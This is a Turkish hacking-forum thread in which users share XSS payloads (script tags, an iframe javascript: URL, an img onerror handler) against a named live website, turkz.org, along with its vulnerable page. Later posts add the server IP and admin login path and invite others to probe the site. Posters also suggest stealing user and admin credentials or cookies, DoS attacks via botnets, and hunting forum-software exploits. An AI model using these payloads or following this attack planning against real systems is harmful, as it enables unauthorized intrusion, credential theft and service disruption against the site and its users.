Türk Hacker Sitesi XSS (turkz.org)

Metafor · 3 Ağu 2018

Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar.

Axis · 3 Ağu 2018

Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam

Metafor · 3 Ağu 2018

Unknown_Right' Alıntı:
Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam

Bu sitede pek önemli değil ama biraz uğraşırsan kullanıcı bilgilerini çalabilirsin. Ya da admin paneli bulursan admin bilgilerini de çalman mümkün.
XSS bir zayıflık işaretidir...

Metafor · 3 Ağu 2018

Unknown_Right' Alıntı:
Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam

Buyur dostum XSS dersleri:

Reflected XSS (Low level)
Reflected XSS (Medium level)
Reflected XSS (High level)

Stored XSS (Low level)
Stored XSS (Medium level)

TheKoswog · 3 Ağu 2018

Metafor' Alıntı:
Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar.

Reis bu sitenin tasarımını çalabilirsen dile benden ne dilersen.

Nobody · 3 Ağu 2018

Metafor · 3 Ağu 2018

Nobody' Alıntı:
boş

Neden

Nobody · 3 Ağu 2018

programla taratıp atma buraya kardeşim işe yaramaz

Metafor · 3 Ağu 2018

Nobody' Alıntı:
programla taratıp atma buraya kardeşim işe yaramaz

Siz nası buluyonuz

Metafor · 3 Ağu 2018

Nobody' Alıntı:
programla taratıp atma buraya kardeşim işe yaramaz

Kardeş siz nasıl açık buluyosunuz?

Silinen üye 7909 · 3 Ağu 2018

Metafor' Alıntı:
Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar.

o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]

Metafor · 3 Ağu 2018

MKA7' Alıntı:
o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]

Bana da mail gelmemişti galiba. Neden üye olmak istiyorsun?

Metafor · 3 Ağu 2018

Nobody' Alıntı:
programla taratıp atma buraya kardeşim işe yaramaz

Hocam tamam belki dandik konu ama soruma cevap vermedim. Bekliyorum hala.

S4tyric0n · 3 Ağu 2018

güldürdün vallahi beni.
şutladım.

Metafor · 3 Ağu 2018

MKA7' Alıntı:
o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]

Ben demin kayıt oldum ama açıklamaya "Açığınızı buldum ağzunuza kürek sokacam." yazdığım için banlanmışım. Öyle diyor.

Silinen üye 7909 · 3 Ağu 2018

Metafor' Alıntı:
Ben demin kayıt oldum ama açıklamaya "Açığınızı buldum ağzunuza kürek sokacam." yazdığım için banlanmışım. Öyle diyor.

kayıt olduktan sonra gelen maili bana gönderir misin kardeşim.

Metafor · 3 Ağu 2018

MKA7' Alıntı:
kayıt olduktan sonra gelen maili bana gönderir misin kardeşim.

Elle onaylıyor. Ondan sonra maile bizim forum böyle bizim forum şöyle diye bir yazı geliyor.
GÖNDERDİM

asdasd123 · 3 Ağu 2018

Portalı çok incelemedim ama xenforo ile bağlantısı varsa bı cookie çeksen sipahiler horror Story

Silinen üye 7909 · 3 Ağu 2018

Bu konu altında boş yorum atmayalım ;
Sunucu ipsi : http://ip51.ip-178-33-220.eu / 178.33.220.51

Admin yolu : http://www.turkz.org/Forum/auth.php

Pentestçi arkadaşları davet ediyorum ben bakmaya devam edeceğim. Gelişme olursa yorum ata ata bildirelim birbirimizi

Nobody · 3 Ağu 2018

açığın kokusu burnumuza geliyor kardeşim

D @Mectruy

asdasd123 · 3 Ağu 2018

Sunucudan birşey yapamazsınız admin panelde boş eve gidene kadar xss kapatmazlarsa ben göstericem xss den ne yapılıyor

( hiçbir türlü bir düşmanlığim yok hatta türk sitesi olduğu için Boran önce açığı kapatsın sipahiler gibi bir grupta saçmalık bu )

Silinen üye 7909 · 3 Ağu 2018

Marowit' Alıntı:
Sunucudan birşey yapamazsınız admin panelde boş eve gidene kadar xss kapatmazlarsa ben göstericem xss den ne yapılıyor ( hiçbir türlü bir düşmanlığim yok hatta türk sitesi olduğu için Boran önce açığı kapatsın sipahiler gibi bir grupta saçmalık bu )

Site cloud kullanıyor, IP botnet yada dosçular için saldırarak sunucuyu offline moduna sokabilrisin. Admin panel muhabbetine gelirsekte araştırmadım fakat muhakkak bir kaç exploit vardır xenforo'Nun burası için müsait olunca araştırıcam zaten

veyiez · 30 Eyl 2020

Eline Sağlık

Türk Hacker Sitesi XSS (turkz.org)

About Us & Legal Notice